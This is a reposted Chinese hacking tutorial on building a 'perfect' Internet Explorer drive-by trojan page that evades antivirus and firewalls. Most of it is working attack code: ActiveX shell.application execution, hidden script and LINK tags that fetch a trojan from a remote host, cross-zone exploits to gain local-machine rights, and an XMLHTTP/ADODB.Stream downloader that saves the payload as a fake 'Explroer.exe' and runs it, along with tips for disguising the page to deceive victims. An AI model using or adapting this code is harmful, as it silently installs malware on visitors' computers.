[轉載]打造完美的IE網頁木馬

資訊來源：icyfox
文章作者：冰狐浪子

（測試頁面:http://www.godog.y365.com/runexe/icyfox.htm，此處所啟動並執行程式不是木馬！)

　　既然要打造完美的ＩＥ網頁木馬，首先就必須給我們的完美製定一個標準，我個人認為一個完美的ＩＥ網頁木馬至少應具備下列四項特徵：
　　一：可以躲過殺毒軟體的追殺；
　　二：可以避開網路防火牆的警示；
　　三：能夠適用於多數的ＷＩＮＤＯＷＳ作業系統（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多數ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ補丁；
　　四：讓瀏覽者不容易發覺ＩＥ變化，即可以悄無聲息，從而可以長久不被發現。
　　（注意以上四點只是指網頁本身而言，但不包括你的木馬程式，也就是說我們的網頁木馬只是負責運行指定的木馬程式，至於你的木馬程式的好壞只有你自己去選擇啦！別找我要，我不會寫的哦！）
　　滿足以上四點我想才可以讓你的馬兒更青春更長久，跑的更歡更快……
　　看了上面的幾點你是不是心動拉？別急，我們還是先侃侃現有的各種ＩＥ網頁木馬的不足吧！
　　第一種：利用古老的MIME漏洞的ＩＥ網頁木馬
　　這種木馬現在還在流行，但因為此漏洞太過古老且適用的ＩＥ版本較少，而當時影響又太大，補丁差不多都補上啦，因此這種木馬的種植成功率比較低。
　　第二種：利用com.ms.activeX.ActiveXComponent漏洞，結合ＷＳＨ及ＦＳＯ控制項的ＩＥ網頁木馬
　　雖然com.ms.activeX.ActiveXComponent漏洞廣泛存在於多數ＩＥ版本中，是一個比較好的漏洞，利用價值非常高，但卻因為它結合了流行的病毒調用的ＷＳＨ及ＦＳＯ控制項，使其雖說可以避開網路防火牆的警示，可逃不脫殺毒軟體的追捕（如諾頓）。
　　第三種：利用OBJECT物件類型確認漏洞（Ｏｂｊｅｃｔ　Ｄａｔａ　Ｒｅｍｏｔｅ）並結合ＷＳＨ及ＦＳＯ控制項的ＩＥ網頁木馬（典型的代表有動鯊網頁木馬產生器）
　　此種木馬最大的優點是適應的ＩＥ版本多，且漏洞較新，但卻有如下不足：
　　１、因為此漏洞要調用Mshta.exe來訪問網路下載木馬程式，所以會引起防火牆警示（如天網防火牆）；
　　２、如果此ＩＥ網頁木馬又利用了ＷＳＨ及ＦＳＯ控制項，同樣逃不脫殺毒軟體的追捕（如諾頓），而
動鯊網頁木馬又恰恰使用了ＷＳＨ及ＦＳＯ控制項，歎口氣……可惜呀……？
　　３、再有就是這個漏洞需要網頁伺服器支援動態網頁如ＡＳＰ、ＪＳＰ、ＣＧＩ等，這就影響了它的發揮，畢竟現在的免費穩定的動態網頁空間是少之又少；雖說此漏洞也可利用郵件ＭＩＭＥ的形式（見我在安全焦點上發表的文章：《由錯誤MIME漏洞的利用想到的......---IE Object Data 資料遠程執行漏洞的利用》http://www.xfocus.net/articles/200309/607.html）來利用，但經測試發現對ＩＥ６．０不起作用。
　　看到上面的分析你是不是有了這種感覺：千軍易得，一將難求，馬兒成群，奈何千裡馬難尋！別急，下面讓我帶這大家一起打造我心中的完美ＩＥ網頁木馬。
　　首先要躲過殺毒軟體的追殺，我們就不能利用ＷＳＨ和ＦＳＯ控制項，因為只要利用了ＷＳＨ和ＦＳＯ控制項就一定逃不脫“諾頓”的追殺，這可叫我們該如何是好？！別急，經過我的努力工作（說真的我也是在研究ＡＳＰ木馬時偶然發現的靈感）終於我有找到了一個可以用的控制項，那就是 shell.application，並且它可是經過了安全認證的，可以在“我的電腦”域中的網頁中暢通無阻的執行，比ＷＳＨ和ＦＳＯ更容易得到執行許可權（利用跨域漏洞即可），請看下面javascript代碼：
程式碼：

<script LANGUAGE="javascript" type="text/javascript">
var shell=new ActiveXObject("shell.application");
shell.namespace("c://Windows//").items().item("Notepad.exe").invokeverb();
</script>

儲存為test.htm後開啟看是否自動開啟了記事本程式，而且不會象ＷＳＨ和ＦＳＯ那樣出現是否允許啟動並執行提示框，是不是有點興趣啦？現在我們已可以運行所有已知路徑的程式，但我們要求運行我們自己的木馬程式，所以還要求把我們的木馬程式下載到瀏覽者的電腦上並找出它的位置。我們一個個來解決：
　　１、下載木馬程式到瀏覽者的電腦中
　　這一點可以有很多解決方案，比如我以前提到的ＷＩＮＤＯＷＳ協助檔案訪問協議下載任意檔案漏洞（its:），不過這次我們不用它，再教大家兩個更好的下載方法：
　　例一：利用script標籤，代碼如下：
<script LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat";></script>

注意此處的LANGUAGE屬性可以為除javascript、VBscript、Jscript以外的字串,也可以是漢字，至於src的屬性當然是你的木馬程式的地址啦！因為現在免費空間出於安全考慮，多數不允許上傳exe檔案，我們可以變通一下把副檔名exe改為bat或pif、scr、com，同樣可以運行。
　　例二：利用LINK標籤，代碼如下：

<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat"; rel=stylesheet type=text/css>

把代碼放在標籤<HEAD></HEAD>中間，href屬性值為木馬程式的地址。
上面兩個是我所知的最好的兩種下載木馬程式的方法，它們下載後的程式都儲存在在ＩＥ臨時目錄Temporary Internet Files目錄下的子目錄中。
　　２、找出已下載到瀏覽者的腦中的木馬程式路徑
　　我們可以利用shell.application控制項的一些屬性和方法，並結合js的錯誤處理try{}catch(e){}finally{}語句,進行遞迴調用來找到木馬程式的路徑，代碼如下：

function icyfoxlovelace(){
//得到ＷＩＮＤＯＷＳ系統目錄和系統硬碟
url=document.location.href;
xtmu=url.substring(6,url.indexOf('//',9)+1);
xtp=url.substr(6,3);

var shell=new ActiveXObject("shell.application");
var runbz=1;

//此處設定木馬程式的大小，以位元組為單位
//請把198201改為你的木馬程式的實際大小
var exeSize=198201;

//設定木馬程式名及副檔名(exe,com,bat,pif,scr)，用於判斷是否是所下載的木馬程式
//請把下面兩行中的icyfox改為你的木馬程式名，bat改為你的木馬程式的副檔名
var a=/icyfox/[/d*/]/.bat/gi;
a.compile("icyfox//[//d*//]//.bat","gi");

var b=/[A-Za-z]:///gi;
b.compile("[A-Za-z]:////","gi");//Regex,用於判斷是否是盤的根目錄

//下面的代碼尋找並運行木馬程式
wjj(xtmu+"Temporary Internet Files//");//Content.IE5//
if(runbz)wjj(xtp+"Documents and Settings//");
if(runbz)yp();

//在所有硬碟分區下尋找並運行木馬程式
function yp(){
try{
var c=new Enumerator(shell.namespace("c://").ParentFolder.Items());
for (;!c.atEnd();c.moveNext()){
if(runbz){if(b.test(c.item().path))wjj(c.item().path);}
else break;
}
}catch(e){}
}

//利用遞迴在指定目錄(包括子目錄)下尋找並運行木馬程式
function wjj(b){
try{
var c=new Enumerator(shell.namespace(b).Items());
for (;!c.atEnd();c.moveNext()){
if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){
var f=c.item().path;
var v=f.lastIndexOf('//')+1;
try{
shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//運行木馬程式
runbz=0;
break;
}catch(e){}
}
if(!c.item().Size)wjj(c.item().path+"//");//如果是子目錄則遞迴調用
}
}catch(e){}
}

}

icyfoxlovelace();

請把以上代碼儲存為icyfox.js。

　　接下來我們就要利用一個小小跨域執行漏洞，來獲得“我的電腦”域的網頁許可權，大家以前是不是和我一樣覺得這種漏洞僅僅只能用來進行跨站指令碼攻擊，得到COOKIE之類的東東呢？這次它終於可以露臉啦！代碼如下：

程式碼： <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <TITLE>冰狐浪子網路技術實驗室的完美ＩＥ網頁木馬</TITLE> </HEAD> <BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0"> <script LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat";></script> <script LANGUAGE="javascript"> //此處設定上面icyfox.js檔案的網路地址 //請把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js檔案實際上傳地址 jsurl="http://www.godog.y365.com/wodemuma/icyfox.js";.replace(////g,'//'); WIE=navigator.appVersion; if(WIE.indexOf("MSIE 5.0")>-1){ /*IE 5.0利用iframe標籤,src屬性設為icyfox://則會使此標籤具備“我的電腦”域的許可權,原因是因為icyfox://是不存在的協議，所以會ＩＥ會利用res://協議開啟SHDOCLC.DLL中的語法錯誤頁syntax.htm，而且SHDOCLC.DLL又位於系統目錄中，為在 icyfox.js中得到ＷＩＮＤＯＷＳ系統目錄和系統硬碟提供資料；*/ document.write("<iframe style='display:none;' name='icyfoxlovelace' src='icyfox://'><//iframe>"); setTimeout("muma0()",1000); } else { /*IE5.5、 IE6.0則利用_search漏洞，把開啟的地址設為icyfox://，從而使_search搜尋方塊具備“我的電腦”域的許可權，因為在IE6.0中無法用上面的iframe漏洞，IE5.5應該可以用，我沒有測試。這樣做的結果會開啟搜尋欄,有點遺憾！*/ window.open("icyfox://","_search"); setTimeout("muma1()",1000); } //下面利用file:javascript:協議漏洞在已是我的電腦”域的許可權的“icyfox://”中插入icyfox.js指令碼並運行 function muma0(){ window.open("file:javascript:document.all.tags('script')[0].src='"+jsurl+"';eval();","icyfoxlovelace"); } function muma1(){ window.open("file:javascript:document.all.tags('script')[0].src='"+jsurl+"';eval();","_search");} </script> </BODY> <NOscript><iframe style="display:none;" src='*.*'></iframe></NOscript> </HTML>

把上面的代碼儲存為icyfox.htm,如果你願意可以把副檔名改為jpg並在網頁中加入一個精美的圖片背景，來做一個圖片木馬，甚至你可以改為 exe，來冒充一個好的程式的，並在網頁的<HEAD></HEAD>中加入標籤<meta http-equiv="refresh" content="5;url='http://www.godog.y365.com/winrar.exe'">來定時轉到另一個真正的程式，從而更好的欺騙別人。

　　看到上面的東東是不是讓你有了馬上去實驗的衝動，別急，如果你覺得win98沒必要控制的話，還有更好的木馬等著你，不知大家是否用過 win2000、winxp等系統中預設安裝的ADODB.Stream及Microsoft.XMLHTTP控制項？它們可是和 shell.application控制項一樣是經過了安全認證的，可以在“我的電腦”域中的網頁中暢通無阻執行的好東西呀！請看下面的代碼：

程式碼： function icyfox(){ //設定下載後儲存在系統目錄下的木馬程式名，我設的是不是很象Explorer.exe呀？呵呵 var name="Explroer.exe"; //設定你要下載的木馬程式的地址（此處你可以把副檔名任意改，甚至沒有副檔名也可以的) //可以更好的躲過免費首頁空間的上傳限制 var url="http://www.godog.y365.com/wodemuma/icyfox.bat";; try{ var folder=document.location.href; folder=folder.substring(6,folder.indexOf('//',9)+1)+name; var xml=new ActiveXObject("Microsoft.XMLHTTP"); xml.open("GET",url,false); xml.send(); if(xml.status==200){ var ado=new ActiveXObject("ADODB.Stream"); ado.Type=1; ado.Open(); ado.write(xml.responseBody); ado.SaveToFile(folder,2); ado.Close(); ado=null; } xml=null; document.body.insertAdjacentHTML('AfterBegin','<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="'+folder+'"></OBJECT>'); } catch(e){} } icyfox();

把上面的的代碼儲存為icyfox.js替換上面儲存的icyfox.js檔案，同樣利用上面的icyfox.htm來注入到“我的電腦”域中，呵呵你就偷這樂吧！
　　最後還請大家發揮以下DIY的能力把上面兩種代碼合二為一，我相信一個現階段最最完美的ＩＥ網頁木馬就會在你手中誕生啦！是不是神不知鬼不覺？
提示代碼如下：

程式碼：

try{new ActiveXObject("ADODB.Stream");icyfox();}catch(e){icyfoxlovelace();}